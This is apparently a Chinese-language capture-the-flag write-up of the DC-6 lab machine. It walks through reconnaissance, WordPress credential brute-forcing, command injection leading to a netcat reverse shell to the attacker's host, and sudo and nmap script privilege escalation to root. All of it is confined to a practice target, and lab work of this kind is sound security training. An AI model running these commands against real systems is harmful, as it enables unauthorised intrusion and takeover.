DC-6靶机复现
字数 940 2025-09-01 11:26:10
DC-6靶机渗透测试详细教学文档
信息收集阶段
1. 目标发现
- 使用ARP扫描发现目标IP:
发现目标IP为arp-scan -l192.168.130.146
2. 端口扫描
- 使用nmap扫描开放端口和服务:
发现开放了:nmap 192.168.130.146- 22端口:SSH服务
- 80端口:Web服务
3. SSH暴力破解尝试
- 尝试使用nmap脚本爆破SSH:
爆破失败,放弃此路径nmap --script=ssh-brute 192.168.130.146
4. Web服务侦察
- 发现无法直接访问Web服务,URL栏显示"wordy"
- 修改hosts文件:
添加:vi /etc/hosts192.168.130.146 wordy
5. 目录扫描
- 使用dirsearch扫描Web目录:
发现登录入口,但缺少凭证dirsearch -u http://wordy
6. WordPress用户枚举
- 使用wpscan枚举用户:
获取用户列表:admin、graham、sarah、mark、jenswpscan --url http://wordy -e u
7. 密码爆破
- 解压密码字典:
gzip -dk /usr/share/wordlists/rockyou.txt.gz - 根据提示筛选包含"k01"的密码:
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt - 使用wpscan爆破:
成功获取凭证:mark/helpdesk01wpscan --url http://wordy -U user.txt -P passwords.txt
初始访问
1. Web登录
- 使用凭证mark/helpdesk01登录WordPress后台
2. 命令注入漏洞利用
- 发现IP转换功能存在命令注入点
- 测试命令注入:
确认可执行命令1.1 | whoami
3. 反弹Shell
- 开启监听:
nc -lvnp 8888 - 通过Burp Suite发送反弹命令(因输入长度限制):
1.1 | nc 192.168.130.128 8888 -e /bin/sh - 升级为交互式Shell:
python -c 'import pty;pty.spawn("/bin/bash")'
权限提升
1. 横向移动至graham用户
- 在mark目录发现graham的密码:
graham - GSo7isUM1D4 - 切换用户:
su graham
2. 检查sudo权限
sudo -l
发现可以无密码以jens用户执行/home/jens/backups.sh
3. 利用备份脚本提权
- 查看备份脚本内容:
cat /home/jens/backups.sh - 尝试注入命令:
成功切换到jens用户echo '/bin/bash' >> /home/jens/backups.sh sudo -u jens /home/jens/backups.sh
4. 最终提权至root
- 检查jens的sudo权限:
发现可以以root身份执行nmapsudo -l - 创建nmap脚本提权:
成功获取root权限echo 'os.execute("/bin/sh")' > getshell.nse sudo nmap --script=getshell.nse
获取flag
- 查找flag文件:
find / -name *flag* - 查看flag内容:
cat /root/theflag.txt
总结
本渗透测试过程涉及:
- 信息收集(ARP扫描、端口扫描、目录枚举)
- 凭证爆破(用户枚举、密码爆破)
- Web漏洞利用(命令注入)
- 权限提升(横向移动、sudo滥用、nmap提权)
关键点:
- 注意靶机提示(密码包含k01)
- 命令注入时注意长度限制
- 仔细检查每个用户的sudo权限
- 灵活利用各种工具的特性进行提权